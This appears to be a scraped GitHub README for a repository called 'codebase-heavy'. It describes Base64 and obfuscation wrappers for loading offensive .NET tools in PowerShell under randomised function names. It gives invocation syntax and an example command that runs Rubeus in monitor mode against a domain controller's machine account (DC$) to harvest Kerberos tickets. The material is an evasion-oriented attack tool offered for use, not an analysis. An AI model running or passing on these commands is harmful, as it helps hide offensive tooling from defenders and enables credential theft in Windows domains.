Skip to content

Latest commit

 

History

History
12 lines (7 loc) · 266 Bytes

README.md

File metadata and controls

12 lines (7 loc) · 266 Bytes

codebase-heavy

Base 64 + OBFS

USE: (Invoke-{FUNC NAME}) -Command "{CMD}"

EXAMPLE: Invoke-3nhxoxe3hww -Command "-h"

-OR-

use: [{NAME}.Program]::Main("ARGS$".Split())

EXAMPLE: [Rubeus.Program]::Main("monitor /monitorinterval:2 /targetuser:DC$ /nowrap".Split())